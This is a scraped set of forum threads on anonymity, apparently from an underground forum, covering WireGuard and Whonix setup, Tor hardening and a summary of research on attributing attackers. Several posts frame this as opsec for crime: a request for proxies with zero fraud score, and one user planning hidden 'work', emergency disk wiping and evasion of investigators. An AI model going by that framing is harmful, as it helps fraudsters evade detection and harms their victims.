Ты будешь ржать, но если тебя пасут, то диапазон твоего впн просто внесут в базу на твое имя. как то так. И не надо косить на провайдеров, что ваш трафик ему интересен, ему похуй. Провайдеру нужны только деньги, больше его ничего не интересует, как вы не можете понять? Провайтер барыга ему нужно только бабло и больше ничего! Ему не нужен головняк. Провайдеру нужен мёд, пчелы ему не нужны! Все остальное к ФСБ и РКН.
PS. Жду настоящей жопы в конце октября! Вот там будет пиздец!

Privacy/Opsec Guide

ID: 676533bbb4103b69df371935
Thread ID: 117504
Created: 2024-06-24T23:32:43+0000
Last Post: 2024-09-07T04:14:20+0000
Author: 2nd2N0NE
Prefix: Мануал/Книга
Replies: 4 Views: 1K

Some points are minimally outdated but the guide is still one of the best there is.

link:
https://pdfhost.io/v/IoU.JxFNq_NOMETA

Как создать свой VPN на WIREGUARD

ID: 676533bbb4103b69df371937
Thread ID: 121472
Created: 2024-08-26T12:19:41+0000
Last Post: 2024-09-03T09:41:21+0000
Author: grizzliess
Replies: 7 Views: 1K

Делаем себя защищёнными с помощью своего VPN на WireGuard

В эпоху цифровых блокировок, слежки за каждым движением в Сети, недоступности каких-то ресурсов по гео вашего IP и подобным причинам, необходимо защищать себя хотя бы базово, вне зависимости от того, личное ли это устройство или рабочее.

Использование готовых VPN-сервисов или официальных хостингов, не решает проблему анонимизации, так как по первому запросу силовых структур ваши реальные данные будут выданы без каких-либо нареканий. Однако, этот момент можно решить путём создания своего VPN на оффшорном хостинге, где бонусом имеется ещё и оплата в криптовалюте.
Спойлер: Достаточно всего лишь VPS.

Gr 'ы'zzly гранит анонимности

Оффшорные хостинги, которые были упомянуты выше - отличное дополнение к тому, что мы планируем сделать. Найти такие можно с помощью простейшего поиска. Однако, обязательно изучите сайт, так как никто не отменял работу мошенников.

1. Для начала подключаемся к нашему VPS.

sudo apt update && sudo apt upgrade -y

Click to expand...

2. Обновляем пакеты системы:

sudo apt update && sudo apt upgrade -y

Click to expand...

3. Установим сам WireGuard:

sudo apt install wireguard -y

Click to expand...

2. На всякий случай, проверяем модуль WireGuard:

sudo modprobe wireguard

Click to expand...

4. Создаём директорию для конфигурации:

sudo mkdir /etc/wireguard

Click to expand...

5. Теперь нам понадобятся ключи конфигурации:

cd /etc/wireguard
sudo wg genkey | sudo tee privatekey | sudo wg pubkey | sudo tee publickey

Click to expand...

6. Сохраняем ключи в буфер переменных:

PRIVATE_KEY=$(sudo cat privatekey)
PUBLIC_KEY=$(sudo cat publickey)

Click to expand...

7. Создаём файл конфигурации:

sudo nano /etc/wireguard/wg0.conf

Click to expand...

8. Добавляем все настройки:

[Interface]
Address = 10.0.0.1/24
ListenPort = 51820
PrivateKey = $PRIVATE_KEY

[Peer]
PublicKey = <CLIENT_PUBLIC_KEY>
AllowedIPs = 10.0.0.2/32

Click to expand...

9. Включите IP-адресацию:

echo "net.ipv4.ip_forward = 1" | sudo tee -a /etc/sysctl.conf
sudo sysctl -p

Click to expand...

10. Так же настроим NAT через iptables:

sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i wg0 -j ACCEPT
sudo iptables -A FORWARD -o wg0 -m state --state RELATED,ESTABLISHED -j ACCEPT

Click to expand...

11. Сохраните правила iptables:

Не забудьте установите пакет iptables-persistent, если он не установлен:

sudo apt install iptables-persistent -y

Click to expand...

Таким образом мы получаем настроенный VPS для создания конфигурации. Теперь же создадим WireGuard на Linux/Ubuntu системах:
1. Установите WireGuard:

sudo apt install wireguard -y

Click to expand...

2. Сгенерируйте ключи:

wg genkey | tee privatekey | wg pubkey | tee publickey

Click to expand...

3. Получите публичный ключ вашего клиента:

CLIENT_PUBLIC_KEY=$(cat publickey)

Click to expand...

4. Добавьте клиент в конфигурацию сервера (отредактируйте файл /etc/wireguard/wg0.conf на сервере):

[Peer]
PublicKey = $CLIENT_PUBLIC_KEY
AllowedIPs = 10.0.0.2/32

Click to expand...

5. Создайте конфигурационный файл клиента (на устройстве):

nano ~/wg0.conf

Click to expand...

6. Добавьте следующую конфигурацию (замените на IP вашего VPS):

[Interface]
Address = 10.0.0.2/24
PrivateKey = <CLIENT_PRIVATE_KEY>

[Peer]
PublicKey = <SERVER_PUBLIC_KEY>
Endpoint = ваш_vps_ip:51820
AllowedIPs = 0.0.0.0/0
PersistentKeepalive = 25

Click to expand...

Сохраняем и готово! Осталось лишь запустить:
1. Запустите WireGuard на сервере:

sudo wg-quick up wg0

Click to expand...

2. Запустите WireGuard в системе:

sudo wg-quick up ~/wg0.conf

Click to expand...

3. Проверьте статус соединения:

sudo wg show

Click to expand...

Бонус от Grizzly Manager:
Чтобы WireGuard автоматически запускался при загрузке системы, выполните следующие команды на сервере:

sudo systemctl enable wg-quick@wg0

Click to expand...

Теперь ваш собственный VPN на базе WireGuard готов к использованию! Удачного сёрфинга!

Grizzly Group - твой надёжный поставщик услуг

Whonix на Vmware. Как перекинуть весь траффик виртуальной машины через TOR

ID: 676533bbb4103b69df37193b
Thread ID: 120588
Created: 2024-08-11T15:47:59+0000
Last Post: 2024-08-25T19:46:12+0000
Author: M1les
Prefix: Статья
Replies: 8 Views: 1K

В этой статье я расскажу, как настроить whonix на VMware для проброса траффика через TOR на других виртуальных машинах.

Хочу заметить, что VMware имеет закрытый исходный код, в сравнении с Virtualbox, имейте это в виду.

Я не нашел отдельной подробной статьи на форуме о настройке whonix в vmware, поэтому статья определенно будет полезна. Приятного прочтения!

1. Скачивание и распаковка образа whonix

Переходим на официальный сайт whonix (https://www.whonix.org), далее идем в раздел загрузок. Скачиваем образ под virtualbox с графическим интерфейсом. Открываем его любым удобным вам архиватором (в моем случае это 7zip), достаем файл *001.vmdk.

2. Создание образа

Для того, чтобы создать загрузочный диск whonix'а для Vmware, перейдем в директорию, в которой у вас установлена VMware. В моем случае это C:\Program Files (x86)\VMware\VMware Workstation
Далее прописываем в cmd команду, которая создаст диск.

vmware-vdiskmanager.exe -r <пусть до вашего распакованного файла whonix> -t 0 <Путь и имя для сохранения нового диска>

vmware-vdiskmanager - утилита для управления виртуальными дискам,
-r указывает на то, что вы хотите "импортировать" или "восстановить" виртуальный диск,
-t используется для указания типа создаваемого виртуального диска. Значение 0 означает, что создается обычный виртуальный диск.

В моем случае команда выглядит так:

vmware-vdiskmanager.exe -r C:\Users\Administrator\Desktop\whonixGW\temp- disk001.vmdk -t 0 C:\Users\Administrator\Desktop\whonixGW\whonix.vmdk

3. Создание виртуальной машины whonix-gateway

Заходим в клиент vmware, жмем правой кнопки мыши на панель с виртуальными машинами и выбираем создать новую виртуальную машину

Далее выбираем custom, в следующем окне жмем next.

Выбираем install operation system later

В окне с выбором ОС я выбрал Debian 10.x 64-bit

Далее называем виртуальную машину и указываем путь, где будут храниться файлы. Лично я размещаю рабочие виртуальные машины в контейнере veracrypt.
При выборе кол-ва ядер cpu я оставил все по дефолту, выделил одно ядро и 2гб ОЗУ. Для этой машины этого достаточно.
В окне Network Type я поставил NAT.

Далее я выбрал по дефолту LSI Logic, в следующем окне Disk Type я оставил по умолчанию - SCSI

Здесь выбираем использовать уже существующий диск. Выбираем ранее созданный диск whonix'а.

Далее в окне выбираем keep existing format и создаем машину.

После создания виртуальной машины, переходим в ее настройки. Нам нужно создать LAN segment.

Замечание. Выбирайте поменьше дискового пространства для виртуальной машины, не как на скриншоте ниже

Запускаем виртуальную машину

4. Настройка Whonix Gateway

Открываем виртуальную машину, соглашаемся с пользовательским соглашением.
Далее открываем терминал от рута (команда sudo su, пароль по дефолту - changeme). Далее идем изменять конфиг, обычно он по пути /etc/systemcheck.d/30_default.conf

sudo nano /etc/systemcheck.d/30_default.conf

Меняем значение NO_EXIT_ON_UNSUPPORTED_VIRTUALIZER с 0 на 1.
Далее жмем ctrl+s и выходим ctrl+x

Перезагружаем машину с помощью команды reboot, чтобы изменения вступили в силу.

После перезагрузки находим утилиту Tor Control Panel, открываем ее, и проверяем, запущен ли TOR.

У меня не коннектился тор с первого раза, на что мне посоветовали изменить Subnet IP и Subnet Mask в настройках vmware.

Заходим во вкладку VMware "edit", далее выбираем Virtual Netrwork Editor.
Выбираем VMnet8, тип NAT. Изменяем Subnet IP и Subnet Mask на следующие значения:

Пробуем запустить whonix - Tor Control Panel

Поздравляю, проблема решена. Теперь можно перейти к созданию другой виртуальной машины, траффик которой будет проходить через TOR.

5. Настройка рабочей машины

Я буду делать на примере windows 10, но вы можете использовать почти любую удобную для вас ОС. На линуксе настройка идет похожим образом.

Создаем виртуальную машину. Я создал выбрал образ windows 10 pro. В качестве сетевого адаптера выбираем LAN segment - созданный ранее нами whonix.

ВАЖНО! Исключите все девайсы, которыми вы не будете пользоваться на виртуальной машине, а самое главное, уберите все сетевые адаптеры, кроме LAN segment - whonix.

Далее возвращаемся к нашей виртуальной машине whonix, нам необходимо получить айпи и маску подсети из конфига, который обычно лежит по пути /etc/network/interfaces.d/30_non-qubes-whonix

sudo nano /etc/network/interfaces.d/30_non-qubes-whonix

Записываем эти данные.
Далее запускаем новую виртуальную машину Переходим в параметры адаптера windows, выбираем Properties.

Отключаем Pv6 и переходим к настройке Pv4
Переписываем значения, полученные ранее.

Не забываем галочку "Подтвердить параметры при выходе"

Пробуем зайти в интернет (к примеру на сайт 2ip.ru) - видим пометку, используется тор.
Поздравляю! Теперь у вас есть виртуальная машина, на которой траффик полностью проходит через ноды тора.

Заключение.

Виртуальная машина с траффиком через TOR - хорошее решение для анонимности. Но важно понимать, использование чего либо, что как-то пересекается с вами (например аккаунт почты, которые вы использовали ранее, без TOR'a), может привести к деанонимизации. Весь смысл проделанных действий теряется.
Настоятельно рекомендую использовать связку VPN-TOR-VPN. Так, вы не будете везде ловить капчи, а самое главное, ваш провайдер не будет видеть, что вы заходите в TOR.
Важное замечание - используете разные впн клиенты, на выходе и на входе
Весь интернет логируется, хостеры пишут логи, провайдеры пишут логи..

Если будут какие то вопросы по настройке - пишите, постараюсь помочь
Надеюсь, эта статья будет полезна, и возможно, даже спасет кого нибудь. Берегите себя и своих близких. До новых встреч!

Интернет-Маскарад и Игра Мориарти в Тени Сети

ID: 676533bbb4103b69df37193e
Thread ID: 99513
Created: 2023-10-06T12:47:43+0000
Last Post: 2024-08-18T14:44:06+0000
Author: MaFio
Prefix: Видео
Replies: 1 Views: 1K

Уже некоторое время на Youtube производится нечто напорядок отличающееся от остального контента, напоминающее некоторые фильмы о мастерах маскировки и зашифрованных злодеях, успешно уходящих от преследования спецслужб. Эта история происходит в виртуальных коридорах русской сети и становится заметным даже тем, кто не ищет захватывающих событий и не любит разгадывать загадки.

Персонаж под псевдонимом Мориарти, столь же непредсказуемый и харизматичный, как и его литературный собрат, уже давно появился на экранах мониторов и не удаляется с них ни по собственной воле, ни по воле третьих сил. Его видео захватывают внимание не только из-за высокого качества видеоряда, но и из-за необычной атмосферы тайны и изощренности применения богатств. Под маской и за ширмой высокотехнологичных камер скрывается человек, который, кажется, знает о цифровой безопасности гораздо больше, чем большинство из нас.

На его канале появился ролик о современных технологиях обеспечения конфиденциальности в интернете, который я и хотел посмотреть из всех. Но какова цена такой информации? В этом обзоре пройдемся по цифровым следам Мориарти, немного прокомментируем технические моменты и общие стратегии, которые помогают сохранять приватность в эпоху всевидящего интернета.

Двусторонняя медаль - сотовый телефон

С современным развитием технологий, сотовые телефоны стали неотъемлемой частью нашей жизни. Они служат не только средством связи, но и инструментом для работы, развлечения, исследования и многого другого. Однако такое всепроникающее присутствие сотовых телефонов в нашей жизни имеет и обратную сторону медали: они могут служить инструментом для мониторинга и слежки.

Средство слежки номер один - это, конечно, сотовый телефон.

Click to expand...

Да, но как же без телефона? Планшета? Хорошо, если их несколько, то можно разделять. Но с правильной настройкой и осознанным использованием технологий, можно минимизировать риски физической безопасности (начиная от чехлов с защитой от слежения до переоборудования устройств), путем выбора мобильной операционной системы, настройки конфиденциальности (управлнения доступом приложений к вашему местоположению, камере, микрофону и другим функциям), шифрования мобильного интернет-трафика, использования специализированного программного обеспечения, созданного специально для защиты вашей конфиденциальности и безопасности на смартфоне.

Искусство непрочитанных сообщений

Такие средства, как ВК, Одноклассники, Viber и прочее да, но

WhatsApp по щелчку пальцев ломается спецслужбами

Click to expand...

WhatsApp использует шифрование end-to-end encryption для всех своих сообщений и звонков, что в теории делает содержание общения недоступным для посторонних, включая сам WhatsApp (протокол Signal, верно?). Как и любое другое программное обеспечение, WhatsApp может содержать уязвимости, которые могут быть использованы спецслужбами для доступа к информации. Прошлые случаи (например, уязвимость, обнаруженная в 2019 году, которая позволяла устанавливать шпионское ПО на телефон с помощью звонка через WhatsApp) показали, что такие угрозы реальны и осуществимы.

Но все же мы помним: как наши спецслужбы сломали Hydra?

Хотя содержание сообщений зашифровано, метаданные (такие как информация о том, кто, когда и с кем общался) могут быть доступны WhatsApp и, потенциально, правоохранительным органам.

С Телеграмм всё понятно! (перефразировано - ред.)

Click to expand...

Правильно : Собственно разработанное решение для конфиденциальной передачи сообщений

Из общедоступных рекомендуется:
- Keybase (в мае 2020 года Keybase был приобретен компанией Zoom, что вызвало обсуждение в сообществе, так как Zoom сталкивалась с проблемами безопасности и конфиденциальности, и приобретение Keybase рассматривалось как попытка усилить безопасность платформы Zoom)
- Matrix/Element (открытый стандарт для обмена сообщениями с акцентом на децентрализацию и безопасность)
-Jabber (XMPP) - самая привлекательная альтернатива для тех, кто ищет децентрализованный, безопасный и гибкий способ общения в интернете.

С двумя последними более понятно и без вопросов, но это не про Keybase, уж точно (похоже, выбирать то особо не из чего, если уж честно) И, видимо, за Tox в курсе. Но можно было обратить внимание на Briar (кстати, они недавно выкатились на десктопы).

Десктопные драмы

Переходим к компьютерам:

Благодаря стандарту ATX выключенный компьютер всегда подключен к питанию, поэтому может принимать, обрабатывать и передавать информацию

Click to expand...

Ну, давайте сначала про стандарт ATX (а то все компьютеры так перестреляем из арбалета) — это форм-фактор материнской платы и блока питания для настольных компьютеров. Этот стандарт был введен Intel в 1995 году и заменил предыдущий стандарт AT. Одной из ключевых особенностей стандарта ATX является возможность материнской платы оставаться частично активной даже после выключения компьютера, если он все еще подключен к сети.

Однако стоит отметить, что, несмотря на то что материнская плата может оставаться активной в определенной степени, это не означает, что компьютер "работает скрыто" и "передает информацию". Он просто может оставаться в ожидании определенных сигналов для пробуждения или выполнения других функций. Пока основные меры безопасности соблюдены, простой факт подключения компьютера к сети (даже с возможностью "Wake on LAN") не делает его автоматически уязвимым для взлома.

Также стоит учесть, что даже если компьютер включен, это не дает автоматического доступа к его содержимому. Для этого атакующему потребуется преодолеть другие уровни защиты, такие как пароли, шифрование, брандмауэры и системы обнаружения вторжений. Как и с любой технологией, важно быть осведомленным и обеспечивать должную настройку и защиту своих устройств.

Про важность шифрование жесткого диска упомянуто (без рекомендаций по ПО), но операционные системы Мориарти выделяет следующие:

- Whonix
- Tails
- Qubes OS
- KiksSecure
- Kali Linux
- Parrot Security
- Debian

Click to expand...

(Windows и MacOS " строго по запретом")

Whonix , хотя и направлен на обеспечение приватности, неизбежно сталкивается с потенциальными угрозами виртуализации в окружении хоста, которые остаются вне контроля этой операционной системы.

Tails , специально созданная для анонимности, но тоже не лишена слабых мест. Её полагание на загрузку с носителей и полностью анонимную работу может столкнуться с ограничениями производительности и удобства использования. Более того, несмотря на её фокус на безопасность, были случаи, когда специалисты по безопасности (команда Facebook, по-моему) обнаруживали и создавали эксплоиты, нацеленные на Tails, в целях отслеживания и ареста злоумышленников.

Qubes OS выделяется своей уникальной архитектурой безопасности, основанной на изоляции: каждое приложение и задача работают в отдельных виртуальных машинах. Это минимизирует риск проникновения угрозы в систему в целом, даже если одна из компонент системы была скомпрометирована. Сочетание этой изоляции с строгим управлением доступом делает Qubes одной из наиболее безопасных операционных систем для десктопов на цифровой витрине, но она очень недружелюбна к новичкам, а сам проект еле живой и неповоротливый, как кажется.

Kicksecure , нацеленная на обеспечение безопасности и приватности, сталкивается с тем, что предложение от ограниченного комьюнити и потенциально меньший фокус на устранение уязвимостей из-за своей нишевой популярности. На базе Debian, но еще "молода" и будет в доработке еще определенное время.

Kali Linux и Parrot Security OS изначально разработаны как инструментальные системы для тестирования на проникновение и кибербезопасности, а не как средства для безопасности, анонимности и приватности. Для обеспечения приватности и анонимности лучше выбирать системы, специально разработанные для этой цели.

Debian - это весьма свободный дистрибутив! Отличается стабильностью, большим количеством пакетов и строгой политикой относительно открытого программного обеспечения. Используется как на серверах, так и на рабочих станциях, и служит основой для многих других дистрибутивов.

Раз список закончился, то и не будем делать еще лучше с HardenedBSD, Alpine Linux, FreeBSD, Arch и другими: например, Fedora, openSUSE, nixOS и т.д.

Далее про наблюдения, слежки и технологию Tor, которая является золотым стандартом в области обеспечения анонимности в интернете, предоставляя слоевую маршрутизацию для обеспечения конфиденциальности. При правильной настройке своих мостов и выходных нод, пользователи могут дополнительно усилить свою анонимность, минимизируя риски утечки данных или выявления их истинного местоположения. В комбинации с прочими методами защиты, Tor предоставляет почти идеальный инструмент для защиты личной информации в цифровой среде.

В принципе ничего нового для многих, но для некоторых это интересная и даже важная информация. А что заставляет человека (или команду людей), который так тщательно скрывает свою личность, делиться знаниями о цифровом мире, где анонимность становится весьма редким и сложнодостижимым ресурсом, держим при уме.

Openwrt на raspberry pi, поднять socks

ID: 676533bbb4103b69df37193f
Thread ID: 109945
Created: 2024-03-08T02:44:47+0000
Last Post: 2024-08-15T11:49:20+0000
Author: godslucy
Replies: 5 Views: 1K

im using openwrt on raspberry , can anyone telling how to use socks5 and tor in openwrt . i should be able to add it from panel rather than doing ssh and changing configs .

please if theres any others ideas to , let me know

Прокси в одни руки

ID: 676533bbb4103b69df371945
Thread ID: 119458
Created: 2024-07-23T17:50:28+0000
Last Post: 2024-07-24T13:47:15+0000
Author: Litara_B
Replies: 8 Views: 1K

Товарищи здравствуйте, подскажите пожалуйста сервис с продажей прокси в одни руки , мб мобильыне прокси, в общем чтоб фрод-скор был 0 и супер большим доверием для сайтов. Сапсибо!

ПО для анонимности

ID: 676533bbb4103b69df371947
Thread ID: 118947
Created: 2024-07-15T18:09:11+0000
Last Post: 2024-07-21T10:35:55+0000
Author: LuckyLips
Replies: 2 Views: 1K

Приветствую. На форуме достаточно много подробных статей про анонимность, whonix, tails, veracrypt и прочее. Но лично я почему-то не смог найти, где были бы собраны все базовые вещи вместе. Кто-то юзает windows через whonix, кто-то на дедике сидит, а кто-то работает в перчатках. Поэтому я бы хотел спросить у опытных людей, несколько советов. Как по их мнению лучше максимально обезопасить свое рабочее место. Мне комфортно и удобно работать на linux, поэтому я бы хотел поставить себе обычную ubuntu c какой-нибудь графической оболочкой (чтоб в браузере сидеть там и тд). Но вот у меня сразу возникает вопрос, насколько будет безопасно поставить это все дело в ноут, который я куплю специапльно для этого. Может есть понимание, какие ноуты нельзя покупать, по тем или иным причинам, а какие лучше купить. Может есть какая-то прошивка биоса или вроде того, что отключить возможные аппаратные слежки, а может это все совсем не нужно, ведь хард я планирую шифровать.

Про шифрование харда. Вроде как самый адекватный вариант, это veracrypt. Но как я понял, он шифрует по паролю (поправьте если не так). Думаю, было бы неплохо сделать шифрование по ключу, который будет записан на флешку. И вообще при выдергивании флешки система выключалась. А при попытке запуска без нее выдавала бы белую часть, не зашифрованную например. Наверное, тут ubuntu не совсем подойдет, но если кто-то знает про такие вещи, то буду благодарен, если поделится информацией. А может быть как раз использовать tails для этого? Но я как-то базово пробежавшись подумал для себя, что это не такой уж и удобный инструмент. Плюс хотелось бы иметь что-то вроде экстренного механизма затирания харда. Например добавивь к флешке пароль и при неправильном вводе вычищать весь диск, пока сотрудник пытается найти на рабочем столе из легальных приложений какую-то инфу.

А как быть с траффиком? Как я понимаю, самый распространый вариант это поставить whonix. Вопрос такой, нужна ли сложная система whonix-brigde и whonix-client, если мы говорим про зашифрованный ноут исключительно под такую работу. Возможно на той же ubuntu можно просто шифровать все через vpn+tor, как это делает tails (как я понял) и этого будет достаточно. Будет ли?

Перефирия. Тут наверное совсем поронойя, но хочется послушать советов от опытных. Прочитал на форуме статью, где советуют использовать перчатки и не оставлять отпечатков. Как думаете есть ли смысл в таком? Вообще, можно ли использовать туже самую мышь, клавиатуру и монитор, которые используются и в белой личности? Как будто бы если комп зашифрован, то проблем быть не должно, но это все моя теория. Также что вы думаете про wifi? Безопасно ли использовать свой даже при условии всех whonix, vpn+tor и тд? Могут ли подменить wifi-точку? Или тянуть провод в ноут совсем паранойя?

Еще стоит добавить, что я по СНГ не работаю и не планирую. Может кто-то обладает информацией насколько в нышешней ситуации налажены каналы связи между службами? И может вообще ничего не стоит делать, если ты миллионами баксов не снимаешь.
Спасибо за ответы, будет очень интересно поизучать.

Раскрытие киберпреступников: гибридный подход глубокого обучения для атрибуции на основе поведения

ID: 676533bbb4103b69df371949
Thread ID: 118946
Created: 2024-07-15T17:40:43+0000
Last Post: 2024-07-16T12:13:58+0000
Author: bratva
Prefix: Статья
Replies: 3 Views: 1K

Продафт тут выдали интересное исследование, рекомендую всем ознакомиться: http://web.archive.org/web/20240715150706/https://dl.acm.org/doi/pdf/10.1145/3676284

У меня нет времени переводить полностью, попробую резюмировать:

1. Все начинается с уже собранной информации с ханипотов - датасета - (привет методу Басстера по бруту популярных паролей!) в Китае, Европе и США :

Our unique dataset comprises various actors and the commands they have executed , with a significant proportion using the Cobalt Strike framework in August 2020-October 2022.

European Threat Intelligence company PRODAFT provided private threat intelligence data collected from August 2020 to October 2022. Commands executed by the attackers were captured by PRODAFT using various private honeypot servers located in China, Europe, and the United States.

2. Датасет был использован для построения гибридной модели, которая добилась точности в своих предсказания - от 89% до 95% для идентификации конкретной группы ~~зло~~ единомышленников:

Hybrid architecture has achieved F1-score of 95.11% and an accuracy score of 95.13% on the high-count dataset, F1-score of 93.60% and accuracy score of 93.77% on the medium-count dataset, and F1-score of 88.95% and accuracy score of 89.25% on the low-count dataset.

3. Поведенческие подписи - это набор отличительных признаков, которые свойствены для конкретного ~~зло~~ единомышленника: все это часть общего профилирования, куда в том числе входят инструменты, тактики и процедуры (ТТП)

Behavioral signatures refer to distinct patterns of activities that can be associated with a specific threat actor. On the other hand, threat actor profiling involves creating comprehensive profiles of cybercriminals based on a range of attributes including, but not limited to, their behavioral signatures, tools used, tactics, techniques, and procedures (TTPs).

4. Изучая уникальные команды и их последовательности , эксперты могут различать модели поведения , которые используется как электронные отпечатки пальцев и позволяют быстро и точно определять ~~зло~~ единомышленников.

By studying the unique commands and sequences a threat actor uses ,experts can discern distinct behavioral patterns that act like digital fingerprints. This facilitates quicker and more accurate investigations by offering insights into the attacker identification.

Attributing CTAs using the sequence of commands they have executed can provide valuable insight into their behavioral processes , which can ease the attribution process

5. Еще раз, в чем суть: ~~зло~~ единомышленники используют различные фреймворки, команды и малвару в своих кампаниях, в случае конкретного исследования речь идет о командах, использованных вместе с Кобой. Последовательности команд , выполняемых ~~зло~~ единомышленниками, значительно различаются : количество варьируется от 1000 до 15 на каждого~~зло~~ единомышленника.

The dataset used in this study comprises unique identifiers of threat actors. Threat actors and CTA groups use various frameworks, commands, and malware to facilitate their activities. In our case, a high portion of the data consists of commands executed using the Cobalt Strike. The sequences of commands executed by CTAs vary significantly , with the volume of commands ranging from as many as 1000 to as few as 15 per threat actor.

6. Датасет включает в себя в том числе и другие фреймворки, не только Кобу. Данные состоят из перечня команд, выполненных~~зло~~ единомышленниками совместно со временем, за которое (когда) они были выполнены. Дата сопровождается уникальными идентификаторами~~зло~~ единомышленников. Например, в Таблице 1 показан пример структуры команд и их содержание.

Dataset contains several attack frameworks , such as the Cobalt Strike. The raw form of the data consists of lists of commands executed by CTAs along with the exact time that is executed. The data is already clustered with CTA’s unique identifications , such that the data is labeled with CTA’s aliases. For example, Table 1 shows a sample command structure and its content.

7. SCLC – этап обобщения данных. В первую очередь SCLC занимается обработкой сырых данных - происходит общее сопоставление команд, т.к. разные вредоносные программы, которые используют ~~зло~~ единомышленники, работают в разных средах и почти совершенно разными способами. Поэтому продафт вручную проверили общие и похожие команды, чтобы сопоставить похожие команды и представить их в виде одной команды (для тренировки модели). Более того, SCLC включает в себя все пути к файлам, домены, имена пользователей и прочией индикаторы~~зло~~ единомышленников.

Подобные команды, такие как Execute_cmd, Run и Start, имеющие одно и то же значение, записываются как команда execute_cmd. Благодаря этому модель становится более совершенной для понимания контекста вне зависимости от вредоносного ПО , которое используют ~~зло~~ единомышленники. Например, два ~~зло~~ единомышленника, использующие разные вредоносные программы для выполнения одной и той же команды с разным синтаксисом, необязательно, но вполне вероятно будут определены моделью. Общая цель - архитектура NLP должна различать CTA не по используемому ими вредоносному ПО, а по уникальному стилю работы.

SCLC - Data Generalization Step. The first place that SCLC is processing raw data. The motivation behind this step isto create a generic command mapping since different malware that CTAs use work in different environments and in nearly completely distinct manners. Therefore, we have manually inspected common and similar commands to create a mapping for similar commands into a single command. Moreover, all file paths, domains, usernames, and indications for a CTA are being obfuscated by SCLC.

Similar commands such as execute_cmd, run, and start, which have the same meaning, are mapped into the command execute_cmd. By doing so, our NLP architecture becomes more aware of the context , becoming independent of the malware that CTA uses. For instance, two threat actors who use different malware to execute the same command with different syntax , not necessarily, but probably. However, our NLP architecture should not distinguish CTAs by the malware they use but by their unique operating style.

8. SCLC — этап работы с таймстэмпами. Данные включают в себя время выполнения команды , в том числе определяются секунды между двумя последовательными командами. Затем вычисляется прошедшее время для каждой последовательной команды , которое идет как команда между ними. Таким образом, мы получаем время ожидания между словами , или, в нашем случае, время размышлений~~зло~~ единомышленника перед выполнением какой-либо команды.

SCLC - Time Feature Generation Step. The data includes the timestamp a command has executed , so one can easily deduce the seconds between two consecutive commands. Then, we calculate the elapsed seconds for each consecutive command and insert it as a command between them. Hence, we are imitating the wait time between words an author writes in their book, or our case,the thought process of a threat actor before executing any command.

9. Важное замечание об ограничениях метода: продафт заявляет, что у них нет доступа в режиме реального времени к жертвам киберпреступлений, а только данные с ханипотов , также команды, собранные в датасет, это только те команды, которые были воспроизведены исключительно~~зло~~ единомышленниками, без команд реальных (нормальных) пользователей (т.е. "необъективность выборки).

In addition, due to the nature of our experiments and the fact that we did not have access to real-life victims but mostly honeypots , our dataset only consists of the commands that the attacker executed. This selective data collection method inherently introduces a selection bias , as it does not capture commands from legitimate users

P. S. Там еще сквозь все исследование вижу привет некоторым людям:

Tor Lockdown: Hacker's Guide to Untraceable Configuration

ID: 676533bbb4103b69df37194a
Thread ID: 118004
Created: 2024-07-02T04:09:22+0000
Last Post: 2024-07-02T04:09:22+0000
Author: blackhunt
Replies: 0 Views: 1K

Hey newbie hacker! So, you've decided to dive into the world of Tor, the onion-routing network that promises anonymity and security on the internet. Before you embark on your journey to becoming a Tor master, let's arm you with a powerful tool: a script that automates the configuration of Tor for enhanced privacy and security.

1. show_current_torrc()

Purpose : To display the current contents of the specified Tor configuration file.

Parameters :

torrc_file: The path to the Tor configuration file.

Functionality :

Uses cat to print the contents of the torrc_file to the terminal.

This allows the user to review the existing settings before any modifications are made.

Bash:Copy to clipboard

show_current_torrc() { local torrc_file="$1" echo "Current content of $torrc_file:" echo "--------------------------------" cat "$torrc_file" echo "--------------------------------" }

2. add_torrc_setting()

Purpose : To add a specified setting to the Tor configuration file if it doesn't already exist and ensure the configuration remains valid.

Parameters :

setting: The setting to be added.

torrc_file: The path to the Tor configuration file.

Functionality :

Copies the original torrc_file to a temporary file.

Checks if the setting already exists in the torrc_file using grep.

If the setting doesn't exist, it appends the setting to the temporary file.

Verifies the temporary file with tor --verify-config to ensure the new setting is valid.

If valid, appends the setting to the actual torrc_file.

Deletes the temporary file to clean up.

Bash:Copy to clipboard

add_torrc_setting() { local setting="$1" local torrc_file="$2" local temp_torrc_file="${torrc_file}.tmp" # Copy original torrc file to a temporary file sudo cp "$torrc_file" "$temp_torrc_file" # Check if the setting already exists in TORRC_FILE if grep -qF "$setting" "$torrc_file"; then echo "Setting \"$setting\" already exists in $torrc_file. Skipping." else # Append the setting to the temporary torrc file echo "$setting" | sudo tee -a "$temp_torrc_file" >/dev/null # Verify the temporary torrc file if ! sudo tor --verify-config -f "$temp_torrc_file"; then echo "Invalid setting \"$setting\". Not adding to $torrc_file." # Remove the temporary file sudo rm "$temp_torrc_file" return 1 fi # Apply the setting to the actual torrc file echo "$setting" | sudo tee -a "$torrc_file" >/dev/null echo "Setting \"$setting\" added to $torrc_file." # Remove the temporary file sudo rm "$temp_torrc_file" fi return 0 }

3. restart_tor_service()

Purpose : To restart the Tor service to apply the new settings.

Parameters :

tor_service: The name of the Tor service, typically "tor".

Functionality :

Uses systemctl to restart the Tor service.

Checks the success of the restart operation and prints appropriate messages.

Additional security settings

Bash:Copy to clipboard

# Show current settings before modification show_current_torrc "$torrc_file" # Add ConnectionPadding setting add_torrc_setting "ConnectionPadding 1" "$torrc_file" || exit 1 # Additional security settings add_torrc_setting "AvoidDiskWrites 1" "$torrc_file" || exit 1 add_torrc_setting "MaxCircuitDirtiness 600" "$torrc_file" || exit 1 add_torrc_setting "DisableDebuggerAttachment 1" "$torrc_file" || exit 1 add_torrc_setting "EntryNodes {US}, {CA}, {FR}" "$torrc_file" || exit 1 add_torrc_setting "ExitNodes {NL}, {DE}, {UK}" "$torrc_file" || exit 1 add_torrc_setting "UseEntryGuards 1" "$torrc_file" || exit 1 add_torrc_setting "ClientOnly 1" "$torrc_file" || exit 1 # Additional security settings (enhanced security) add_torrc_setting "MaxClientCircuits 200" "$torrc_file" || exit 1

1.ConnectionPadding 1
Purpose: Adds random padding to Tor connections to thwart traffic analysis attempts by adversaries.

Reason: By making it harder to distinguish communication patterns, this setting enhances privacy and complicates surveillance efforts.
2.AvoidDiskWrites 1
Purpose: Instructs Tor to minimize disk writes to mitigate risks of data leakage and residual traces.

Reason: Enhances operational security by reducing the footprint left on the system, thus lowering the risk of exposing Tor-related activities.

